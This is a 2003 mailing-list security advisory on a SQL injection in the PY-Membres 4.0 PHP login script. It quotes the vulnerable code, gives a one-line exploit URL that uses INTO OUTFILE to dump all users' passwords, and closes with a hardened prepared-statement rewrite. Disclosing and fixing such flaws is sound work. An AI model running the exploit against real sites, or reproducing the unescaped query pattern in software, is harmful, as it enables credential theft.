[VulnWatch] PY-Membres 4.0 (PHP)
From: "Frog Man" <leseulfrog@hotmail.com>
To: vulnwatch@vulnwatch.org
Date: Sun, 06 Apr 2003 20:16:25 +0200
Information :
°°°°°°°°°°°°°
Website : http://www.py-scripts.com/
Tested version : 4.0
PHP Config : magic_quotes_gpc=OFF
Problem : SQL Injection
PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
login.php :
------------------------------------------------------------------------
<?
session_start();
session_name("pys");
include("config.php");
include("functions.php");
// $login and $pass arrive straight from the request (register_globals);
// est_vide() only rejects empty values, it does not escape or validate them.
est_vide($login,"Vous n\'avez pas saisi de login !");
est_vide($pass,"Vous n\'avez pas saisi de mot de passe !");
connexiondb();
// $login is concatenated unescaped into the query: this is the injection point.
// With magic_quotes_gpc=OFF a single quote in $login closes the string literal.
$sql = "SELECT passwd FROM $db_table WHERE login='$login'";
// On error the full query text and the MySQL error are echoed back to the client.
$req = mysql_query($sql) or die('Erreur SQL !<br>'.$sql.'<br>'.mysql_error());
$data = mysql_fetch_array($req);
// Passwords are compared in clear text against the stored passwd column.
if($data['passwd'] != $pass)
{
echo "<p>Mauvais login / password. Merci de recommencer</p>";
mysql_close();
exit;
}
else
{
$ploginy=$login;
session_register('ploginy');
$ip=$REMOTE_ADDR;
$host=gethostbyaddr($ip);
$log=date("d/m/Y à H\hi | ");
$log.=$ip." | ".$host;
// The same unescaped $login (as $ploginy) is reused in the UPDATE statement.
$action = mysql_query("UPDATE $db_table SET lastlog='$log' WHERE login='$ploginy'") or die (mysql_error()) ;
mysql_close();
Header("Location: membre.php");
}
?>
------------------------------------------------------------------------
Exploit :
°°°°°°°°°
http://[target]/login.php?login='%20OR%20ISNULL(NULL)%20INTO%20OUTFILE%20'/path/to/site/file.txt&pass=1
will save all users' passwords into the file http://[target]/file.txt.
Solution :
°°°°°°°°°°
A patch can be found at http://www.phpsecure.info.
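As an added illustration of how the login could be hardened (this is example code written for this page, not the PY-Membres script and not the phpsecure.info patch), the following rewrite of login.php sends the login value as a bound parameter instead of concatenating it into the SQL string, reads the request fields explicitly instead of relying on register_globals, and compares a password hash rather than clear text. It assumes config.php defines $db_dsn, $db_user, $db_pass and $db_table (hypothetical names) and that the passwd column holds password_hash() output.

```php
<?php
// Added example, not the original PY-Membres code: hardened login.php.
// Assumes config.php defines $db_dsn, $db_user, $db_pass and $db_table
// (assumed names) and that passwd stores password_hash() output.
session_name("pys");
session_start();
require "config.php";

// Read credentials explicitly from the request instead of register_globals.
$login = isset($_POST['login']) ? $_POST['login'] : '';
$pass  = isset($_POST['pass'])  ? $_POST['pass']  : '';
if ($login === '' || $pass === '') {
    echo "<p>Mauvais login / password. Merci de recommencer</p>";
    exit;
}

$pdo = new PDO($db_dsn, $db_user, $db_pass, [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false,   // real server-side prepared statements
]);

// A table name cannot be a bound parameter, so whitelist it against a strict pattern.
if (!preg_match('/^[A-Za-z0-9_]+$/', $db_table)) {
    http_response_code(500);
    exit;
}

// The login value travels as data, not as SQL text: a quote in it cannot close
// the literal, so neither an OR clause nor INTO OUTFILE can be appended.
$stmt = $pdo->prepare("SELECT passwd FROM `$db_table` WHERE login = :login");
$stmt->execute([':login' => $login]);
$row = $stmt->fetch(PDO::FETCH_ASSOC);

// One failure path for "unknown user" and "wrong password", and no query text
// or database error message is echoed to the client.
if ($row === false || !password_verify($pass, $row['passwd'])) {
    echo "<p>Mauvais login / password. Merci de recommencer</p>";
    exit;
}

session_regenerate_id(true);          // new session id on login (anti-fixation)
$_SESSION['ploginy'] = $login;

$ip  = $_SERVER['REMOTE_ADDR'];
$log = date("d/m/Y à H\hi | ") . $ip . " | " . gethostbyaddr($ip);
$upd = $pdo->prepare("UPDATE `$db_table` SET lastlog = :log WHERE login = :login");
$upd->execute([':log' => $log, ':login' => $login]);

header("Location: membre.php");
exit;
```

The prepared statement removes the injection itself; the other changes address what the advisory's code also exposes: the die() that prints the query and mysql_error() to the browser, the clear-text password comparison, and the reuse of the same unescaped value in the UPDATE. Disabling PDO::ATTR_EMULATE_PREPARES matters because with emulation the driver quotes parameters client-side, whereas native prepares keep query structure and data separate on the server.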
More Details In French :
°°°°°°°°°°°°°°°°°°°°°°°°
http://www.frog-man.org/tutos/PY-Membres4.0.txt
frog-m@n